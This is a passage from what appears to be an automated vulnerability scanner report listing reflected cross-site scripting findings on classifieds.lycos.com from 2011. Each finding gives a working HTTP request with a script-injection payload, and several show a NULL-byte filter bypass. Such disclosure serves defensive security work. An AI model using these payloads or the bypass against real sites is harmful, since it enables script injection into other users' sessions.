<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-freeb3718"><script>alert(1)</script>7a2e16f3111/?mobile=1" rel="nofollow">
...[SNIP]...

1.102. http://classifieds.lycos.com/sale-free/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-free/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dd1"><script>alert(1)</script>6bbefb1baf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-free/?30dd1"><script>alert(1)</script>6bbefb1baf7=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:10 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-free/?30dd1"><script>alert(1)</script>6bbefb1baf7=1&mobile=1" rel="nofollow">
...[SNIP]...

1.103. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3add9"><script>alert(1)</script>643e66701bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-bed3add9"><script>alert(1)</script>643e66701bc/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-bed3add9"><script>alert(1)</script>643e66701bc/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?mobile=1" rel="nofollow">
...[SNIP]...

1.104. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cf480"><script>alert(1)</script>5e3d57aa082 was submitted in the REST URL parameter 2. This input was echoed as cf480"><script>alert(1)</script>5e3d57aa082 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805%00cf480"><script>alert(1)</script>5e3d57aa082 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:05:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:05:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805%00cf480"><script>alert(1)</script>5e3d57aa082?mobile=1" rel="nofollow">
...[SNIP]...

1.105. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e2b"><script>alert(1)</script>f3ffee32f1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?72e2b"><script>alert(1)</script>f3ffee32f1e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:04:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:09 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Fbed; path=/
Set-Cookie: classifieds[lastpage][0][name]=Beds+%26+Bedroom+Sets; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805?72e2b"><script>alert(1)</script>f3ffee32f1e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.106. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-sofa/sofas-furnishings-other-2416111056

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 331be"><script>alert(1)</script>8eab472e6d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-sofa331be"><script>alert(1)</script>8eab472e6d8/sofas-furnishings-other-2416111056 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:25 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-sofa331be"><script>alert(1)</script>8eab472e6d8/sofas-furnishings-other-2416111056?mobile=1" rel="nofollow">
...[SNIP]...

1.107. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-sofa/sofas-furnishings-other-2416111056

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004e3ff"><script>alert(1)</script>38fe35f9b8a was submitted in the REST URL parameter 2. This input was echoed as 4e3ff"><script>alert(1)</script>38fe35f9b8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture-sofa/sofas-furnishings-other-2416111056%004e3ff"><script>alert(1)</script>38fe35f9b8a HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-sofa/sofas-furnishings-other-2416111056%004e3ff"><script>alert(1)</script>38fe35f9b8a?mobile=1" rel="nofollow">
...[SNIP]...

1.108. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-sofa/sofas-furnishings-other-2416111056

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2b58"><script>alert(1)</script>7ef5e310c7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-sofa/sofas-furnishings-other-2416111056?b2b58"><script>alert(1)</script>7ef5e310c7a=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:04:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:08 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Fsofa; path=/
Set-Cookie: classifieds[lastpage][0][name]=Sofas; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-sofa/sofas-furnishings-other-2416111056?b2b58"><script>alert(1)</script>7ef5e310c7a=1&mobile=1" rel="nofollow">
...[SNIP]...

1.109. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-table/dining-table-dining-and-kitchen-2416111088

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce54"><script>alert(1)</script>88b33ce779f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-table3ce54"><script>alert(1)</script>88b33ce779f/dining-table-dining-and-kitchen-2416111088 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:10 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-table3ce54"><script>alert(1)</script>88b33ce779f/dining-table-dining-and-kitchen-2416111088?mobile=1" rel="nofollow">
...[SNIP]...

1.110. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-table/dining-table-dining-and-kitchen-2416111088

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e35a4"><script>alert(1)</script>b00d785867 was submitted in the REST URL parameter 2. This input was echoed as e35a4"><script>alert(1)</script>b00d785867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /sale-furniture-table/dining-table-dining-and-kitchen-2416111088%00e35a4"><script>alert(1)</script>b00d785867 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-table/dining-table-dining-and-kitchen-2416111088%00e35a4"><script>alert(1)</script>b00d785867?mobile=1" rel="nofollow">
...[SNIP]...

1.111. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture-table/dining-table-dining-and-kitchen-2416111088

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84b59"><script>alert(1)</script>a9b434e50f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture-table/dining-table-dining-and-kitchen-2416111088?84b59"><script>alert(1)</script>a9b434e50f4=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:03:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:44 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=sale%2Ffurniture%2Ftable; path=/
Set-Cookie: classifieds[lastpage][0][name]=Tables+%26+Stands; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture-table/dining-table-dining-and-kitchen-2416111088?84b59"><script>alert(1)</script>a9b434e50f4=1&mobile=1" rel="nofollow">
...[SNIP]...

1.112. http://classifieds.lycos.com/sale-furniture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e0ee"><script>alert(1)</script>bcff27a0c0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture5e0ee"><script>alert(1)</script>bcff27a0c0c/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:44 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture5e0ee"><script>alert(1)</script>bcff27a0c0c/?mobile=1" rel="nofollow">
...[SNIP]...

1.113. http://classifieds.lycos.com/sale-furniture/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6893"><script>alert(1)</script>be377872f04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture/?e6893"><script>alert(1)</script>be377872f04=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:04:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:11 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture/?e6893"><script>alert(1)</script>be377872f04=1&mobile=1" rel="nofollow">
...[SNIP]...

1.114. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1851a"><script>alert(1)</script>c657708d1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-furniture1851a"><script>alert(1)</script>c657708d1d/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:04:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:11 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-furniture1851a"><script>alert(1)</script>c657708d1d/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146?mobile=1" rel="nofollow">
...[SNIP]...

1.115. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146

Issue detail

